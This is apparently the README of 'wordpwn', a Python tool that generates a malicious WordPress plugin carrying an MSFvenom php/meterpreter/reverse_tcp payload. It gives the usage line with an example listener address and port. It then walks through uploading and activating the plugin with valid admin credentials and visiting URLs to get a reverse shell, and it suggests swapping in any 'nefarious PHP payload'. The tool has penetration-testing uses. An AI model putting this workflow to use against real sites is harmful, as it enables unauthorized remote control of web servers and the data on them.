Malicious WordPress plugin
This utility simply generates a WordPress plugin that will grant you a reverse shell once uploaded. I recommend installing Kali Linux, as MSFvenom is used to generate the payload.
It goes without mentioning that in order for this method to be effective, you must have credentials to a valid User account, with rights to add plugins to the WordPress website ;)
root@wetw0rk:~# python wordpwn.py __ __ _ \ \ / /__ _ __ __| |_ ____ ___ __ \ \ /\ / / _ \| __/ _ | _ \ \ /\ / / _ \ \ V V / (_) | | | (_| | |_) \ V V /| | | | \_/\_/ \___/|_| \__,_| .__/ \_/\_/ |_| |_| |_| Usage: wordpwn.py [LHOST] [LPORT] [HANDLER] Example: wordpwn.py 192.168.0.6 8888 Y
How and When do I use this?
Usage is super simple, simply pass wordpwn your listening address and listening port and execute the script. You are also given the option to start a handler, I recommend that you do... since by default the plugin will be made using a
php/meterpreter/reverse_tcp reverse shell.If you have your own nefarious PHP payload simply adjust the script to accept it.
After the script is ran, a zip file (the plugin) called
malicious.zip will be created in the current directory (and a handler will be started if you specified it with the
Upload this zip file as a new plugin (by browsing to the URL
Once uploaded, you have to activate the plugin.
Be sure to start our listener (if you didn't specify the handler with the
Y option) !
Once the plugin installed and activated, just navigate to the following URLs to launch the reverse shell :
I want to be 100% sure that I give credit to Rob Carr. Rob Carr is the author of the Metasploit module
wp_admin_shell_upload, which this script is based on. You can find more information on his module at Rapid7 .